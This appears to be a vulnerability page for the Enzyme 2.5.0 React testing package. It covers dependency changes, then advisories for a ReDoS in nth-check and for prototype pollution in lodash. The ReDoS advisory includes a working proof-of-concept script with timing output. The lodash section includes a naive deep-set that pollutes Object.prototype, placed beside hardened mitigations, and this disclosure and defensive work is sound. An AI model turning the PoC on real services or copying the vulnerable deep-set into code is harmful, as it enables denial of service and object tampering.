Enzyme version 2.5.0 introduces notable updates and refinements compared to its predecessor, version 2.4.2, enhancing the developer experience for React testing. A key difference lies in the dependencies. Version 2.5.0 upgrades cheerio to ^0.22.0 while 2.4.2 uses ^0.20.0. The newer version drops the dependency on function.prototype.name, in-publish, and object.entries, and introduces object.values as a dependency. These modifications might reflect internal code optimizations and API improvements, potentially leading to more efficient and streamlined testing workflows.
Furthermore, the development dependencies see significant shifts, with upgrades across Babel-related packages (babel-cli, babel-core, babel-eslint, babel-loader, babel-preset-airbnb, babel-register), ESLint and its plugins (eslint, eslint-config-airbnb, eslint-plugin-import, eslint-plugin-jsx-a11y, eslint-plugin-react), and other tools like karma, mocha, sinon and webpack. This suggests an effort to modernize the development environment and incorporate the latest linting, testing, and build practices. Developers upgrading to version 2.5.0 benefit from these updated tools, which can lead to better code quality, improved test coverage, and a smoother integration with modern JavaScript workflows.
The peer dependency declaration for React remains similar, but version 2.5.0 explicitly declares support for React 15.x. These changes collectively contribute to a more robust, up-to-date, and developer-friendly testing experience with Enzyme.
All the vulnerabilities related to version 2.5.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability in the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))?, whose two quantified \s* groups are adjacent and overlap because the ([+-]?) between them can match the empty string, so a long run of whitespace is split between them in every possible way before the match fails. It can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n" followed by a growing run of spaces and a trailing "!" that guarantees the parse fails
    var attack_str = '2n' + ' '.repeat(i*10000)+"!";
    try {
        nthCheck.parse(attack_str)
    }
    catch(err) {
        // parse() throws on the invalid input; the elapsed time is the cost of the regex backtracking
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
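The mitigation a consumer of the affected package can apply without waiting for a patched release is to stop feeding untrusted selector text to a backtracking regex at all. The example below is added here and is not nth-check's own code: it parses the CSS an+b micro-syntax with a hand-written scanner that consumes each character at most once (so a run of spaces costs time linear in its length), and wraps it in a length-capped parser that maps malformed input to null. The regex BACKTRACKING_RE is an assumption about the shape of the affected expression built around the sub-pattern quoted in the advisory, kept only for side-by-side comparison; the function names, MAX_NTH_LENGTH and the constructed CRAFTED_INPUT are this example's own.

```javascript
// Added example, not nth-check's own code: a linear-time, backtracking-free
// parser for the CSS an+b micro-syntax, plus a length guard, as a mitigation
// for the quadratic regex behaviour shown in the advisory.

// Assumption: a full an+b regex built around the advisory's vulnerable
// sub-pattern, kept only so the two approaches can be compared on the same input.
const BACKTRACKING_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

function isWs(ch) {
  return ch === " " || ch === "\t" || ch === "\n" || ch === "\r" || ch === "\f";
}

// Returns [a, b] for "an+b" (also "odd"/"even"); throws on malformed input.
// Every character is consumed at most once, so there is nothing to backtrack over.
function parseNth(formula) {
  const s = String(formula).trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];
  let i = 0;
  const skipWs = () => { while (i < s.length && isWs(s[i])) i++; };
  const readSign = () => {
    if (i < s.length && (s[i] === "+" || s[i] === "-")) return s[i++] === "-" ? -1 : 1;
    return 0; // no explicit sign present
  };
  const readDigits = () => {
    const start = i;
    while (i < s.length && s[i] >= "0" && s[i] <= "9") i++;
    return s.slice(start, i);
  };
  const fail = () => { throw new Error("Invalid nth expression: " + JSON.stringify(formula)); };

  let a = 0;
  let b = 0;
  const sign = readSign();
  const digits = readDigits();
  if (i < s.length && s[i] === "n") {
    i++;
    a = digits === "" ? 1 : parseInt(digits, 10); // "n" and "+n" mean 1n, "-n" means -1n
    if (sign === -1) a = -a;
    skipWs();
    const bSign = readSign();
    if (bSign !== 0) {
      skipWs();
      const bDigits = readDigits();
      if (bDigits === "") fail(); // "2n+" with no offset digits
      b = bSign * parseInt(bDigits, 10);
    }
  } else {
    if (digits === "") fail(); // nothing but a sign, or empty input
    b = (sign === -1 ? -1 : 1) * parseInt(digits, 10);
  }
  if (i !== s.length) fail(); // trailing garbage such as the PoC's "!" is rejected here
  return [a, b];
}

// Assumption: real an+b selectors are a handful of characters, so anything longer
// is rejected before any parsing happens. This bound is the example's own choice.
const MAX_NTH_LENGTH = 64;

// Defensive wrapper: cap the input size, and map parse failures to null so the
// caller never has to distinguish crafted input from an ordinary typo.
function parseNthSafely(formula, maxLength = MAX_NTH_LENGTH) {
  if (typeof formula !== "string" || formula.length > maxLength) return null;
  try {
    return parseNth(formula);
  } catch (err) {
    return null;
  }
}

// Constructed sample in the shape of the advisory's input, small enough to run instantly.
const CRAFTED_INPUT = "2n" + " ".repeat(200) + "!";

console.log(parseNth("2n+1"));              // [2, 1]
console.log(parseNthSafely(CRAFTED_INPUT)); // null: over the length cap, never parsed
```

The length cap is the cheap first line of defence for any selector or formula string that arrives from a request, and the scanner is the structural one: a parser that never revisits input cannot exhibit the superlinear timings shown in the PoC output, whatever the input length.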
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
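The mechanism the advisory describes is easiest to see in a minimal deep-set: when a path segment such as __proto__ is looked up on a plain object, the lookup returns Object.prototype, and the next write lands there. The example below is added here and is not lodash's own code: naiveSet is a reduced deep-set in the spirit of set() that trusts every path segment, safeSet is the hardened form that refuses prototype keys and only descends into own properties, and isPrototypePolluted is a runtime check a service can run on a fresh object. The function names, FORBIDDEN_KEYS and the sentinel property name used in demonstrate() are this example's own, and demonstrate() deletes the sentinel it wrote so the process is left clean.

```javascript
// Added example, not lodash's own code: a minimal deep-set in the naive form
// that lets a user-supplied path reach Object.prototype, beside a hardened
// form, plus a check for whether the prototype has already been modified.

// Path segments that resolve to prototype objects rather than own data.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function toPath(path) {
  return Array.isArray(path) ? path.map(String) : String(path).split(".");
}

function isObjectLike(v) {
  return typeof v === "object" && v !== null;
}

// Naive deep-set: trusts every segment. cur["__proto__"] on a plain object is
// Object.prototype, so a path such as "__proto__.isAdmin" writes to it.
function naiveSet(target, path, value) {
  const keys = toPath(path);
  let cur = target;
  for (let k = 0; k < keys.length - 1; k++) {
    if (!isObjectLike(cur[keys[k]])) cur[keys[k]] = {};
    cur = cur[keys[k]];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Hardened deep-set: rejects prototype keys outright and only descends into
// own properties, so inherited objects are never reachable through the path.
function safeSet(target, path, value) {
  const keys = toPath(path);
  for (const key of keys) {
    if (FORBIDDEN_KEYS.has(key)) {
      throw new TypeError("refusing to traverse prototype key " + JSON.stringify(key));
    }
  }
  let cur = target;
  for (let k = 0; k < keys.length - 1; k++) {
    const key = keys[k];
    if (!Object.prototype.hasOwnProperty.call(cur, key) || !isObjectLike(cur[key])) {
      cur[key] = {};
    }
    cur = cur[key];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Runtime check: has the named property become an own property of
// Object.prototype, and therefore visible on every fresh object?
function isPrototypePolluted(property) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, property);
}

// Constructed scenario: a settings update whose key path comes from a request
// body. Returns what each variant did and removes the sentinel afterwards.
function demonstrate() {
  const sentinel = "__example_polluted_sentinel__"; // constructed property name
  const userPath = "__proto__." + sentinel;

  naiveSet({}, userPath, true);
  const pollutedByNaive = isPrototypePolluted(sentinel);
  const seenOnFreshObject = ({})[sentinel] === true;
  delete Object.prototype[sentinel]; // restore the process to a clean state

  let safeRejected = false;
  try {
    safeSet({}, userPath, true);
  } catch (err) {
    safeRejected = err instanceof TypeError;
  }
  const pollutedBySafe = isPrototypePolluted(sentinel);

  return { pollutedByNaive, seenOnFreshObject, safeRejected, pollutedBySafe };
}

console.log(demonstrate());
// { pollutedByNaive: true, seenOnFreshObject: true, safeRejected: true, pollutedBySafe: false }
```

Rejecting the three key names is the check most fixes for this class of bug add; descending only through own properties is the second layer that also stops a path from walking into any other inherited object. The same reasoning applies to any code that turns user-provided keys or arrays into nested writes, which is exactly the precondition the advisory gives for being affected.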